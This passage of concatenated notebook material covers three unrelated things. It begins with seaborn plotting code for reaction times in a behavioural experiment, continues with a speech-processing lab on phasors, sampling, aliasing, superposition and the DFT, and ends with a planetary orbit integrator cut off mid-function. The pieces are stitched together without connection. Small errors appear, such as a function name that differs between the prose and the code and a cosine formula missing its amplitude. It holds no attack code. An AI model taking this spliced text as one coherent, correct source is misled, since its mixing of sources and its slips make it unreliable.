plot.fig.suptitle(SBJ) # can also get the figure from plt.gcf()
plt.savefig(results_dir+'BHV/RTs/hist_PE_ITI/'+SBJ+'_RT_PE_ITI_hit'+fig_type)
# WARNING: I would need to go across subjects to get variance in accuracy by ITI
plot = sns.factorplot(data=data,x='ITI type',y='Acc_ITI',col='Condition',kind='point',sharey=False,
ci=95);#,order=ITI_plot_order
#plot.set(alpha=0.5)
plt.subplots_adjust(top=0.9)
plot.fig.suptitle(SBJ) # can also get the figure from plt.gcf()
plt.savefig(results_dir+'BHV/accuracy/'+SBJ+'_acc_ITI'+fig_type)
```
## Look for behavioral adjustments following short and long responses
```
# NOTE: data_PL and data_PS are assumed to be the post-long and post-short subsets; define them from the 'postlong' column
data_PL = data[data['postlong']==True]
data_PS = data[data['postlong']==False]
plot = sns.factorplot(data=data_PL,x='ITI type',y='RT',hue='PE',col='Condition',kind='point',
ci=95,order=prdm['ITIs']);
plt.subplots_adjust(top=0.9)
plot.fig.suptitle(SBJ+'_post-long') # can also get the figure from plt.gcf()
# plt.savefig(results_dir+'RT_plots/'+SBJ+'_RT_PE_ITI_hit'+fig_type)
plot2 = sns.factorplot(data=data_PS,x='ITI type',y='RT',hue='PE',col='Condition',kind='point',
ci=95,order=prdm['ITIs']);
plt.subplots_adjust(top=0.9)
plot2.fig.suptitle(SBJ+'_post-short') # can also get the figure from plt.gcf()
# plt.savefig(results_dir+'RT_plots/'+SBJ+'_RT_PE_ITI_hit'+fig_type)
```
#### _Speech Processing Labs 2021: SIGNALS 1: Digital Signals: Sampling and Superposition_
```
## Run this first!
%matplotlib inline
import sys
import matplotlib.pyplot as plt
import numpy as np
import cmath
from matplotlib.animation import FuncAnimation
from IPython.display import HTML
plt.style.use('ggplot')
from dspMisc import *
```
# Digital Signals: Sampling and Superposition
### Learning Outcomes
* Understand how we can approximate a sine wave with a specific frequency, given a specific sampling rate
* Understand how sampling rate limits the frequencies of sinusoids we can describe with discrete sequences
* Explain when aliasing will occur and how this relates to the sampling rate and the Nyquist frequency.
* Observe how compound waveforms can be described as a linear combination of phasors ('superposition')
### Background
* Topic Videos: Digital Signal, Short Term Analysis, Series Expansion
* [Interpreting the discrete fourier transform](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)
#### Extra background (extension material)
* [Phasors, complex numbers and sinusoids](./signals-1-2a-digital-signals-complex-numbers.ipynb)
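One of the learning outcomes above is understanding when aliasing occurs. As a small numerical sketch (the frequencies and sampling rate here are chosen purely for illustration): a 9 Hz sine sampled at 8 Hz produces exactly the same sample values as a 1 Hz sine, because 9 Hz lies above the Nyquist frequency (8/2 = 4 Hz) and aliases down to 9 − 8 = 1 Hz.

```python
import numpy as np

fs = 8                    # sampling rate (Hz); Nyquist frequency = fs/2 = 4 Hz
n = np.arange(16)         # 2 seconds of samples
t = n / fs

high = np.sin(2 * np.pi * 9 * t)  # 9 Hz: above the Nyquist frequency
low = np.sin(2 * np.pi * 1 * t)   # 1 Hz: its alias at this sampling rate

print(np.allclose(high, low))  # True: the two sinusoids are indistinguishable once sampled
```

Once sampled, the two signals are identical, so no amount of processing can tell them apart.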
## 1 Introduction
In the class videos, you've seen that sound waves are changes in air pressure (amplitude) over time. In the notebook [interpreting the discrete fourier transform](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb), we saw that we can
decompose complex sound waves into 'pure tone' frequency components. We also saw that the output of the DFT was actually a sequence of complex numbers! In this notebook, we'll give a bit more background on the relationship
between complex numbers and sinusoids, and why it's useful to characterise sinusoids in the complex plane.
## 2 Phasors and Sinusoids: tl;dr
At this point, I should say that you can get a conceptual understanding of digital signal processing concepts without going through _all_ the math. We certainly won't be examining your knowledge of complex numbers or geometry in this class. Of course, if you want to go further in understanding digital signal processing then you will have to learn a bit more about complex numbers, algebra, calculus and geometry than we'll touch upon here.
However, right now the main point that we'd like you to take away from this notebook is that we can conveniently represent periodic functions, like sine waves, in terms of **phasors**: basically what is shown on the left hand side of the following gif:

You can think of the **phasor as an analogue clockface** with one moving hand. On the right hand side is one period of a 'pure tone' sinusoid, sin(t).
Now, we can think of every movement of the 'clockhand' (the phasor is actually this **vector**) as a step in time on the sinusoid graph: at every time step, the phasor (i.e., clockhand) rotates by some angle. If you follow the blue dots on both graphs, you should be able to see that the amplitude of the sinusoid matches the height of the clockhand on the phasor at each time step.
This gives us a different way of viewing the periodicity of $\sin(t)$. The sinusoid starts to repeat itself when the phasor has done one full circle. So, rather than drawing out an infinite time vs amplitude graph, we can capture the behaviour of this periodic function in terms of rotations with respect to this finite circle.
So, what's the connection with complex numbers? Well, that blue dot on the phasor actually represents a complex number, and the dimensions of that graph are actually the **real** (horizontal) and **imaginary** (vertical) parts of that number. That is, a complex number of the form $a + jb$, where $a$ is the real part and $b$ is the imaginary part. Quite conveniently, we can also express complex numbers in terms of a **magnitude** or radius $r$ (length of the clockhand) and a **phase angle** $\theta$ (angle of rotation from the point (1,0)) and an exponential. So, we can write each point that the phasor hits in the form $re^{j\theta}$. This will be familiar if you've had a look at the DFT formulae.
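As a quick aside, we can check this equivalence between the rectangular ($a + jb$) and polar ($re^{j\theta}$) forms numerically. This is just an illustrative sketch using numpy; the specific value of `z` is arbitrary:

```python
import numpy as np

# An arbitrary complex number in rectangular form: a + jb
z = 3 + 4j

# Its polar form: magnitude r (the clockhand length) and phase angle theta
r = np.abs(z)        # 5.0
theta = np.angle(z)  # angle in radians, measured from the point (1, 0)

# Rebuilding the rectangular form from r and theta recovers z
z_rebuilt = r * np.exp(1j * theta)
assert np.isclose(z, z_rebuilt)
```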
This relationship with complex numbers basically allows us to describe complicated periodic waveforms in terms of combinations of 'pure tone' sinusoids. It turns out that maths for this works very elegantly using the phasor/complex number based representation.
The basic things you need to know are:
* A **sinusoid** (time vs amplitude, i.e. in the **time domain**) can be described in terms of a vector rotating around a circle (i.e. a phasor in the complex plane)
* The **phasor** vector (i.e., 'clockhand') is described by a complex number $re^{j\theta}$
* $re^{j\theta}$ is a point on a circle centered at (0,0) with radius $r$, rotated by angle $\theta$ from $(r,0)$ on the 2D plane.
* the **magnitude** $r$ tells us what the peak amplitude of the corresponding sine wave is
* the **phase angle** $\theta$ tells us how far around the circle the phasor has gone:
* zero degrees (0 radians) corresponds to the point (r,0), while 90 degrees ($\pi/2$ radians) corresponds to the point (0,r)
* The vertical projection of the vector (onto the y-axis) corresponds to the amplitude of a **sine wave** $\sin(\theta)$
* The horizontal projection of the vector (onto the x-axis) corresponds to the amplitude of a **cosine wave** $\cos(\theta)$
* The **period** of these sine and cosine waves is the same as the time it takes to make one full circle of the phasor (in seconds). As such the **frequency** of the sine and cosine waves is the same as the frequency with which the phasor makes a full cycle (in cycles/second = Hertz).
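The bullet points above can be verified with a few lines of numpy. This sketch just sweeps a unit-magnitude phasor through one full cycle and checks that its vertical and horizontal projections trace out sine and cosine waves:

```python
import numpy as np

# Sweep the phase angle through one full cycle (0 to 2*pi radians)
thetas = np.linspace(0, 2 * np.pi, 100)
r = 1.0
zs = r * np.exp(1j * thetas)   # phasor positions on the unit circle

# Vertical (imaginary) projection is a sine wave ...
sine_wave = np.imag(zs)
# ... and the horizontal (real) projection is a cosine wave
cosine_wave = np.real(zs)

assert np.allclose(sine_wave, r * np.sin(thetas))
assert np.allclose(cosine_wave, r * np.cos(thetas))
```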
If you take the maths on faith, you can see all of this just from the gif above. You'll probably notice in most phonetics text books, if they show this at all, they will just show the rotating phasor without any of the details.
If you want to know more about how this works, you can find a quick tour of these concepts in the (extension) notebook on [complex numbers and sinusoids](./sp-m1-2-digital-signals-complex-numbers). But it's fine if you don't get all the details right now. In fact, if you get the intuition behind the phasor/sinusoid relationship above, it's fine to move on now to the rest of the content in this notebook.
## Changing the frequency of a sinusoid
So, we think of sine (and cosine) waves in terms of taking steps around a circle in the 2D (complex) plane. Each of these 'steps' is represented by a complex number, $re^{j\theta}$ (the phasor), where the magnitude $r$ tells you the radius of the circle, and the phase angle $\theta$ tells you how far around the circle you are. When $\theta = 0$, you are at the point (r,0), while $\theta = 90$ degrees means you are at the point (0,r). 360 degrees (or $2\pi$ radians) makes a complete cycle, i.e. when $\theta = 360$ degrees, you end up back at (r,0).
<div class="alert alert-success">
It's often easier to deal with angles measured in <strong>radians</strong> rather than <strong>degrees</strong>. The main thing to note is that:
$$2\pi \text{ radians} = 360 \text{ degrees, i.e. 1 full circle }$$
Again, it may not seem obvious why we should want to use radians instead of the more familiar degrees. The reason is that it makes dividing up a circle really nice and neat and so ends up making calculations much easier in the long run!
</div>
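For example, numpy's conversion helpers make the radians/degrees relationship concrete:

```python
import numpy as np

# One full circle: 360 degrees = 2*pi radians
assert np.isclose(np.deg2rad(360), 2 * np.pi)
assert np.isclose(np.rad2deg(np.pi / 2), 90.0)

# Quarter turns divide up the circle neatly in radians: 0, pi/2, pi, 3*pi/2, 2*pi
quarter_turns = np.arange(5) * np.pi / 2
```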
So that describes a generic sinusoid, e.g. $\sin(\theta)$, but now you might ask yourself: how do we generate a sine wave with a specific frequency $f$ Hertz (Hz = cycles/second)?
Let's take a concrete example, if we want a sinusoid with a frequency of $f=10$ Hz, that means:
* **Frequency:** we need to complete 10 full circles of the phasor in 1 second.
* **Period:** So, we have to complete 1 full cycle every 1/10 seconds (i.e. the period of this sinusoid $T=0.1$ seconds).
* **Angular velocity:** So, the phasor has to rotate at a speed of $2\pi/0.1 = 20\pi$ radians per second
So if we take $t$ to represent time, a sine wave with frequency 10 Hz has the form $\sin(20\pi t)$
* Check: at $t=0.1$ seconds we have $\sin(20 \times \pi \times 0.1) = \sin(2\pi)$, one full cycle.
* This corresponds to the phasor $e^{20\pi t j}$, where $t$ represents some point in time.
In general:
* A sine wave with peak amplitude R and frequency $f$ Hz is expressed as $R\sin(2 \pi f t)$
* The amplitude of this sine wave at time $t$ corresponds to the imaginary part of the phasor $Re^{2\pi ftj}$.
* A cosine wave with peak amplitude R and frequency $f$ Hz is expressed as $\cos (2 \pi f t$)
* The amplitude of this cosine wave at time $t$ corresponds to the real part of the phasor $Re^{2\pi ftj}$.
The term $2\pi f$ corresponds to the angular velocity, often written as $\omega$ which is measured in radians per second.
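We can check these relationships numerically. The sketch below (with arbitrary choices of $R$, $f$ and time points) confirms that the imaginary part of $Re^{2\pi ftj}$ is $R\sin(2\pi ft)$ and the real part is $R\cos(2\pi ft)$:

```python
import numpy as np

R = 1.5                         # peak amplitude
f = 10                          # frequency in Hz
t = np.linspace(0, 0.5, 1000)   # half a second of time points
omega = 2 * np.pi * f           # angular velocity in radians/second

phasor_vals = R * np.exp(1j * omega * t)

# Imaginary part = sine wave, real part = cosine wave
assert np.allclose(np.imag(phasor_vals), R * np.sin(omega * t))
assert np.allclose(np.real(phasor_vals), R * np.cos(omega * t))

# Periodicity check: the wave repeats every 1/f seconds
assert np.isclose(np.sin(omega * 0.3), np.sin(omega * (0.3 + 1 / f)))
```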
### Exercise
Q: What's the frequency of $\sin(2\pi t)$?
## Frequency and Sampling Rate
The representation above assumes we're dealing with a continuous sinusoid, but since we're dealing with computers we need to think about digital (i.e. discrete) representations of waveforms.
So if we want to analyze a wave, we also need to sample it at a specific **sampling rate**, $f_s$.
For a given sampling rate $f_s$ (samples/second) we can work out the time between each sample, the **sampling period** as:
$$ t_s = \frac{1}{f_s}$$
The units of $t_s$ are seconds/sample. That means that if we want a phasor to complete $f$ cycles/second, the angle $\theta_s$ between consecutive samples will need to be a certain size in order to complete a full cycle every $1/f$ seconds.
The units here help us figure this out: the desired frequency $f$ has units cycles/second. So, we can calculate what fraction of a complete cycle we need to take with each sample by multiplying $f$ with the sampling time $t_s$.
* $c_s = ft_s$.
* cycles/sample = cycles/second x seconds/sample
We know each cycle is $2\pi$ radians (360 degrees), so we can then convert $c_s$ to an angle as follows:
* $ \theta_s = 2 \pi c_s $
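Putting those steps together in code (here with illustrative values $f=2$ Hz and $f_s=16$, matching the example further below):

```python
import math

f = 2          # desired frequency (cycles/second)
f_s = 16       # sampling rate (samples/second)

t_s = 1 / f_s                 # sampling period: 0.0625 seconds/sample
c_s = f * t_s                 # fraction of a cycle per sample: 0.125
theta_s = 2 * math.pi * c_s   # angle per sample: pi/4 radians

# pi/4 radians per step means 8 samples complete one full cycle
assert math.isclose(8 * theta_s, 2 * math.pi)
```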
### Exercise
Q: Calculate the period $t_s$ and angle $\theta_s$ between samples for a sine wave with frequency $f=8$ Hz and sampling rate of $f_s=64$ samples/second
### Notes
### Setting the Phasor Frequency
I've written a function `gen_phasors_vals_freq` that calculates the complex phasor values (`zs`), angles (`thetas`) and time steps (`tsteps`) for a phasor with a given frequency `freq` over a given time period (`Tmin` to `Tmax`). In the following we'll use this to plot how changes in the phasor relate to changes in the corresponding sinusoid given a specific sampling rate (`sampling_rate`).
#### Example:
Let's look at a phasor and corresponding sine wave with frequency $f=2$ Hz (`freq`), given a sampling rate of $f_s=16$ (`sampling_rate`) over 4 seconds.
```
## Our parameters:
Tmin = 0
Tmax = 4
freq = 2 # cycles/second
sampling_rate = 16 # i.e, f_s above
t_step=1/sampling_rate # i.e., t_s above
## Get our complex values corresponding to the phasor with frequency freq
zs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)
## Project to real and imaginary parts for plotting
Xs = np.real(zs)
Ys = np.imag(zs)
## generate the background for the plot: a phasor diagram on the left, a time v amplitude graph on the right
fig, phasor, sinusoid = create_anim_bkg(tsteps, thetas, freq)
## the phasor is plotted on the left, with a circle of radius 1 for reference
phasor.set_xlabel("Real values")
phasor.set_ylabel("Imaginary values")
# plot the points the phasor will "step on"
phasor.scatter(Xs, Ys)
## Plot our actual sampled sine wave in magenta on the right
sinusoid.plot(tsteps, Ys, 'o', color='magenta')
sinusoid.set_xlabel("Time (s)")
sinusoid.set_ylabel("Amplitude")
```
You should see two graphs above:
* On the left is the phasor diagram: the grey circle represents a phasor with magnitude 1, the red dots represent the points on the circle that the phasor samples between `tmin` and `tmax` given the `sampling_rate`.
* On the right is the time versus amplitude graph: the grey line shows a continuous sine wave with frequency `freq`, the magenta dots show the points we actually sample between times `tmin` and `tmax` given the `sampling_rate`.
You can see that although we sample 64 points for the sine wave, we actually just hit the same 8 values per cycle on the phasor.
It's clearer when we animate the phasor in time:
```
## Now let's animate it!
## a helper to draw the 'clockhand' line
X, Y, n_samples = get_line_coords(Xs, Ys)
## initialize the animation
line = phasor.plot([], [], color='b', lw=3)[0]
sin_t = sinusoid.plot([], [], 'o', color='b')[0]
figs = (line, sin_t)
anim = FuncAnimation(
fig, lambda x: anim_sinusoid(x, X=X, Y=Y, tsteps=tsteps, figs=figs), interval=600, frames=n_samples)
HTML(anim.to_html5_video())
```
### Exercise
Change the `freq` variable in the code below to investigate:
* What happens when the sine wave frequency `freq` (cycles/second) approaches half the `sampling_rate`?
* What happens when `freq` equals half the `sampling_rate` (i.e. `sampling_rate/2`)?
* What happens when `freq` is greater than `sampling_rate/2`?
```
## Example: Play around with these values
Tmax = 1
Tmin = 0
freq = 15 # cycles/second
sampling_rate = 16 # f_s above
t_step=1/sampling_rate
print("freq=%.2f cycles/sec, sampling rate=%.2f samples/sec, sampling period=%.2f sec" % (freq, sampling_rate, t_step) )
## Get our complex values corresponding to the sine wave
zs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)
## Project to real and imaginary parts for plotting
Xs = np.real(zs)
Ys = np.imag(zs)
## generate the background
fig, phasor, sinusoid = create_anim_bkg(tsteps, thetas, freq)
## Plot the phasor samples
phasor.scatter(Xs, Ys)
phasor.set_xlabel("Real values")
phasor.set_ylabel("Imaginary values")
## Plot our actual sampled sine wave in magenta
sinusoid.plot(tsteps, Ys, 'o-', color='magenta')
sinusoid.set_xlabel("Time (s)")
sinusoid.set_ylabel("Amplitude")
## Animate the phasor and sinusoid
X, Y, n_samples = get_line_coords(Xs, Ys)
line = phasor.plot([], [], color='b', lw=3)[0]
sin_t = sinusoid.plot([], [], 'o', color='b')[0]
figs = (line, sin_t)
anim = FuncAnimation(
fig, lambda x: anim_sinusoid(x, X=X, Y=Y, tsteps=tsteps, figs=figs), interval=600, frames=n_samples)
HTML(anim.to_html5_video())
```
### Notes
## Aliasing
If you change the frequency (`freq`) of the phasor to be higher than half the sampling rate, you'll see that the actual frequency of the sinusoid doesn't keep getting higher. In fact, with `freq=8` the sine wave (i.e. projection of the vertical (imaginary) component) doesn't appear to have any amplitude modulation at all. However, keen readers will note that for `sampling_rate=16` and `freq=8` in the example above, the real projection (i.e. cosine) would show amplitude modulations, since $\cos(t)$ is 90 degrees phase shifted relative to $\sin(t)$. The phasor with `freq=15` appears to complete only one cycle per second, just like for `freq=1`, but appears to rotate the opposite way.
These are examples of **aliasing**: given a specific sampling rate there is a limit to which we can distinguish different frequencies because we simply can't take enough samples to show the difference!
In the example above, even though we are sampling from a 15 Hz wave for `freq=15`, we only get one sample per cycle and the overall sampled sequence looks like a 1 Hz wave. So, the fact that the phasor appears to rotate the opposite way to `freq=1` is because it's actually just the 15th step of the `freq=1` phasor.
<div class="alert alert-success">
In general, with a sampling rate of $f_s$ we can't distinguish between a sine wave of frequency $f_0$ and a sine wave of $f_0 + kf_s$ for any integer $k$.
</div>
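We can verify this with a couple of lines of numpy: sampling a $f_0 + kf_s$ Hz sine wave at $f_s$ samples/second produces exactly the same amplitude values as sampling the $f_0$ Hz wave (the specific values here are illustrative):

```python
import numpy as np

f_s = 16                         # sampling rate (samples/second)
t = np.arange(0, 1, 1 / f_s)     # one second of sample times
f0 = 1                           # base frequency (Hz)

for k in [1, 2, 3]:
    alias = f0 + k * f_s         # 17 Hz, 33 Hz, 49 Hz
    # The sampled amplitudes are indistinguishable from the 1 Hz wave
    assert np.allclose(np.sin(2 * np.pi * f0 * t),
                       np.sin(2 * np.pi * alias * t))
```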
This means that we can't actually tell the frequency of the underlying waveform based on the sample amplitudes alone.
The practical upshot of this is that for sampling rate $f_s$, the highest frequency we can actually sample is $f_s/2$, the **Nyquist Frequency**. This is one of the most important concepts in digital signal processing and will affect pretty much all the methods we use. It's why we see the mirroring effect in [the DFT output spectrum](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb). So, if you remember just one thing, remember this!
## Superposition
This use of phasors to represent sinusoids may seem excessively complex at the moment, but it actually gives us a nice way of visualizing what happens when we add two sine waves together, i.e. linear superposition.
We've seen how the Fourier Transform gives us a way of breaking down periodic waveforms (no matter how complicated) into a linear combination of sinusoids (cosine waves, specifically). But if you've seen the actual DFT equations, you'll have noticed that each DFT output is actually described in terms of phasors of specific frequencies (e.g. sums over $e^{-j \theta}$ values). We can now get at least a visual idea of what this means.
Let's look at how combining phasors can let us define complicated waveforms in a simple manner.
### Magnitude and Phase Modifications
First, let's note that we can easily change the magnitude and phase of a sine wave before adding it to others to make a complex waveform.
* We can change the magnitude of a sinusoidal component by multiplying all the values of that sinusoid by a scalar $r$.
* We can apply a phase shift of $\phi$ radians to $\sin(\theta)$ to give us a sine wave of the form $\sin(\theta + \phi)$. It basically means we start our cycles around the unit circle at $e^{j\phi}$ instead of at $e^{j0} = 1 + j0 \mapsto (1,0)$
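In the complex-number representation, both modifications are just multiplications: scaling by a real number $r$ changes the magnitude, and multiplying by $e^{j\phi}$ rotates every phasor value by $\phi$. A small sketch (with arbitrary $r$ and $\phi$):

```python
import numpy as np

thetas = np.linspace(0, 2 * np.pi, 200)
zs = np.exp(1j * thetas)       # unit-magnitude phasor, no phase shift

r, phi = 0.5, np.pi / 3        # arbitrary magnitude and phase shift
zs_mod = r * zs * np.exp(1j * phi)

# The sine (imaginary) projection is now a scaled, phase-shifted sine wave
assert np.allclose(np.imag(zs_mod), r * np.sin(thetas + phi))
```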
### Generating linear combinations of sinusoids
Let's plot some combinations of sinusoids.
First let's set the sampling rate and the start and end times of the sequence we're going to generate:
```
## Some parameters to play with
Tmax = 2
Tmin = 0
sampling_rate = 16
t_step=1/sampling_rate
```
Now, let's create some phasors with different magnitudes, frequencies and phases. Here we create 2 phasors with magnitude 1 and no phase shift, one with `freq=2` Hz and another phasor with frequency `2*freq`.
We then add the two phasors values together at each timestep (`zs_sum` in the code below):
```
## Define a bunch of sinusoids. We can do this in terms of 3 parameters:
## (magnitude, frequency, phase)
## The following defines two sinusoids, both with magnitude (peak amplitude) 1 and the same phase (no phase shift)
## The second has double the frequency of the first:
freq=2
params = [(1, freq, 0), (1, 2*freq, 0)]
## Later: change these values and see what happens, e.g.
#params = [(1, freq, 0), (0.4, 5*freq, 0), (0.4, 5*freq, np.pi)]
phasor_list = []
theta_list = []
tsteps_list = []
## Generate a list of phasors for each set of (mag, freq, phase) parameters
for mag, freq, phase in params:
## Generate a phasor with frequency freq
## zs are the phasor values
## thetas are the corresponding angles for each value in zs
## tsteps are the corresponding time steps for each value in zs
zs, thetas, tsteps = gen_phasor_vals_freq(Tmin=Tmin, Tmax=Tmax, t_step=t_step, freq=freq)
## Apply the phase_shift
phase_shift = np.exp(1j*phase)
## scale by the magnitude mag - changes the peak amplitude
zs = mag*zs*phase_shift
## Append the phasor to a list
phasor_list.append(zs)
## The angle sequence and time sequence in case you want to inspect them
## We don't actually use them below
theta_list.append(thetas)
tsteps_list.append(tsteps)
## Superposition: add the individual phasors in the list together (all with the same weights right now)
zs_sum = np.zeros(len(tsteps_list[0]))
for z in phasor_list:
zs_sum = zs_sum + z
```
Now, we can plot the sine (vertical) component of the individual phasors (on the right), ignoring the cosine (horizontal) component for the moment.
```
## Plot the phasor (left) and the projection of the imaginary (vertical) component (right)
## cosproj would be the projection to the real axis, but let's just ignore that for now
fig, phasor, sinproj, cosproj = create_phasor_sinusoid_bkg(Tmin, Tmax, ymax=3, plot_phasor=True, plot_real=False, plot_imag=True,)
dense_tstep=0.001
for mag, freq, phase in params:
## We just want to plot the individual sinusoids (time v amplitude), so we ignore
## the complex numbers we've been using to plot the phasors
_, dense_thetas, dense_tsteps = gen_phasor_vals_freq(Tmin, Tmax, dense_tstep, freq)
sinproj.plot(dense_tsteps, mag*np.sin(dense_thetas+phase), color='grey')
```
Now plot the sum of the phasors (left) and the projected imaginary component in magenta (right) - that is, the sum of the sine components (in grey)
```
## Plot sinusoids as sampled
Xlist = []
Ylist = []
## some hacks to get to represent the individual phasors as lines from the centre of a circle as well as points
for i, zs in enumerate(phasor_list):
Xs_ = np.real(zs)
Ys_ = np.imag(zs)
X_, Y_, _ = get_line_coords(Xs_, Ys_)
Xlist.append(X_)
Ylist.append(Y_)
## Project the real and imaginary parts of the timewise summed phasor values
Xs = np.real(zs_sum)
Ys = np.imag(zs_sum)
Xline, Yline, _ = get_line_coords(Xs, Ys)
## plot the summed phasor values as 2-d coordinates (left)
## plot the sine projection of the phasor values in time (right)
sinproj.plot(tsteps_list[0], Ys, color='magenta')
fig
```
Now let's see an animation of how we're adding these phasors together!
```
anim = get_phasor_animation(Xline, Yline, tsteps, phasor, sinproj, cosproj, fig, Xlist=Xlist, Ylist=Ylist, params=params)
anim
```
In the animation above you should see:
* the red circle represents the first phasor (`freq=2`)
* the blue circle represents the 2nd phasor (`freq=4`)
* In adding the two phasors together, we add the corresponding vectors for each phasor at each point in time.
### Exercise:
* What happens when you add up two sinusoids with the same frequency but different magnitudes?
* e.g. `params = [(1, freq, 0), (2, freq, 0)]`
* What happens when you change the phase?
* Can you find $\phi$ such that $\sin(\theta+\phi) = \cos(\theta)$ ?
* When do the individual sinusoids cancel each other out?
* Assume you have a compound sinusoid defined by the following params:
* `params = [(1, freq, 0), (0.4, 5*freq, 0)]`
* What sinusoid could you add to cancel the higher frequency component out while keeping the lower frequency one?
### Notes
## Maths Perspective: The DFT equation as a sum of phasors
Now if you look at the mathematical form of the DFT, you can start to recognize this as representing a sequence of phasors of different frequencies, which have a real (cosine) and imaginary (sine) component.
The DFT is defined as follows:
* For input: $x[n]$, for $n=0..N-1$ (i.e. a time series of $N$ samples)
* We calculate an output of N complex numbers $\mapsto$ magnitude and phases of specific phasors:
Where the $k$th output, DFT[k], is calculated using the following equation:
$$
\begin{align}
DFT[k] &= \sum_{n=0}^{N-1} x[n] e^{-j \frac{2\pi n}{N} k} \\
\end{align}
$$
Which is equivalent to the following (using Euler's rule):
$$
\begin{align}
DFT[k] &= \sum_{n=0}^{N-1} x[n]\big[\cos(\frac{2\pi n}{N} k) - j \sin(\frac{2\pi n}{N} k) \big]
\end{align}
$$
This basically says that each DFT output is the result of multiplying the $n$th input value $x[n]$ with the $n$th sample of a phasor (hence sine and cosine waves) of a specific frequency, and summing the result (hence the complex number output). The frequency of DFT[k] is $k$ times the frequency of DFT[1], where the frequency of DFT[1] depends on the input size $N$ and the sampling rate (as discussed in [this notebook](./signals-1-1-interpreting-the-discrete-fourier-transform.ipynb)). The sampling rate determines the time each phasor step takes, hence how much time it takes to make a full phasor cycle, hence what frequencies we can actually compare the input against.
The pointwise multiplication and summation is also known as a dot product (aka inner product). The dot product between two vectors tells us how similar those two vectors are. So in a very rough sense, the DFT 'figures out' which frequency components are present in the input, by looking at how similar the input is to each of the N phasors represented in the DFT output.
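To make the 'dot product with phasors' view concrete, here's a naive (and slow) DFT written directly from the equation above, checked against numpy's FFT. This is purely illustrative; in practice you'd use `np.fft.fft`:

```python
import numpy as np

def naive_dft(x):
    """DFT[k] = sum_n x[n] * exp(-j * 2*pi*n*k / N)."""
    N = len(x)
    n = np.arange(N)
    out = np.zeros(N, dtype=complex)
    for k in range(N):
        # A phasor whose frequency is k cycles per N samples
        phasor = np.exp(-1j * 2 * np.pi * n * k / N)
        # Pointwise multiply and sum: a dot product with the input
        out[k] = np.sum(x * phasor)
    return out

# Check against numpy's FFT on a short random input
rng = np.random.default_rng(0)
x = rng.standard_normal(32)
assert np.allclose(naive_dft(x), np.fft.fft(x))
```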
There are two more notebooks on the DFT for this module, but both are extension material (not essential).
* [This notebook](./signals-1-3-discrete-fourier-transform-in-detail.ipynb) goes into more maths details but is purely extension (you can skip)
* [This notebook](./signals-1-4-more-interpreting-the-dft.ipynb) looks at a few more issues in interpreting the DFT
So, you can look at those if you want more details. Otherwise, we'll move onto the source-filter model in the second signals lab!
```
%matplotlib inline
import matplotlib.pyplot as plt
import numpy as np
from collections import namedtuple
class planet():
"A planet in our solar system"
def __init__(self,semimajor,eccentricity):
self.x = np.zeros(2) #x and y position
self.v = np.zeros(2) #x and y velocity
self.a_g = np.zeros(2) #x and y acceleration
self.t = 0.0 #current time
self.dt = 0.0 #current timestep
self.a = semimajor #semimajor axis of the orbit
self.e = eccentricity #eccentricity of the orbit
self.istep = 0 #current integer timestep
self.name = "" #name for the planet
solar_system = { "M_sun":1.0, "G":39.4784176043574320}
def SolarCircularVelocity(p):
G = solar_system["G"]
M = solar_system["M_sun"]
r = (p.x[0]**2 + p.x[1]**2)**0.5
#return the circular velocity
return (G*M/r)**0.5
def SolarGravitationalAcceleration(p):
G = solar_system["G"]
M = solar_system["M_sun"]
r = (p.x[0]**2 + p.x[1]**2)**0.5
#acceleration in AU/yr/yr
a_grav = -1.0*G*M/r**2
#find the angle at this position
if(p.x[0]==0.0):
if(p.x[1]>0.0):
theta = 0.5*np.pi
else:
theta = 1.5*np.pi
else:
theta = np.arctan2(p.x[1],p.x[0])
#set the x and y components of the velocity
#p.a_g[0] = a_grav * np.cos(theta)
#p.a_g[1] =a_grav * np.sin(theta)
return a_grav*np.cos(theta), a_grav*np.sin(theta)
def calc_dt(p):
#integration tolerance
ETA_TIME_STEP = 0.0004
#compute timestep
eta = ETA_TIME_STEP
v = (p.v[0]**2 + p.v[1]**2)**0.5
a = (p.a_g[0]**2 + p.a_g[1]**2)**0.5
dt = eta * np.fmin(1./np.fabs(v),1./np.fabs(a)**0.5)
return dt
def SetPlanet(p, i):
AU_in_km = 1.495979e+8 #an AU in km
#circular velocity
v_c = 0.0 #circular velocity in AU/yr
v_e = 0.0 #velocity at perihelion in AU/yr
#planet-by planet initial conditions
#Mercury
if(i==0):
#semi-major axis in AU
p.a = 57909227.0/AU_in_km
#eccentricity
p.e = 0.20563593
#name
p.name = "Mercury"
#Venus
elif(i==1):
#semi-major axis in AU
p.a = 108209475.0/AU_in_km
#eccentricity
p.e = 0.00677672
#name
p.name = "Venus"
#Earth
elif(i==2):
#semi-major axis in AU
p.a = 1.0
#eccentricity
p.e = 0.01671123
#name
p.name = "Earth"
#set remaining properties
p.t = 0.0
p.x[0] = p.a*(1.0-p.e)
p.x[1] = 0.0
#get equiv circular velocity
v_c = SolarCircularVelocity(p)
#velocity at perihelion
v_e = v_c*(1 + p.e)**0.5
#set velocity
p.v[0] = 0.0 #no x velocity at perihelion
p.v[1] = v_e #y velocity at perihelion (counter clockwise)
#calculate gravitational acceleration from Sun
p.a_g = SolarGravitationalAcceleration(p)
#set timestep
p.dt = calc_dt(p)
def x_first_step(x_i, v_i, a_i, dt):
#x_1/2 = x_0+ 1/2 v_0 Delta_t + 1/4 a_0 Delta t^2
return x_i + 0.5*v_i*dt + 0.25*a_i*dt**2
def v_full_step(v_i,a_ipoh,dt):
#v_i+1 = v_i + a_i+1/2 Delta t
return v_i + a_ipoh*dt;
def x_full_step(x_ipoh, v_ipl, a_ipoh, dt):
#x_3/2 = x_1/2 + v_i+1 Delta t
return x_ipoh + v_ipl*dt;
def SaveSolarSystem(p, n_planets, t, dt , istep, ndim):
#loop over the number of planets
for i in range(n_planets):
#define a filename
fname = "planet.%s.txt" % p[i].name
if(istep==0):
#create the file on the first timestep
fp = open(fname,"w")
else:
#append the file on subsequent timesteps
fp = open(fname,"a")
#compute the drifted properties of the planet
v_drift = np.zeros(ndim)
for k in range(ndim):
v_drift[k] = p[i].v[k] + 0.5*p[i].a_g[k]*p[i].dt
#write the data to file
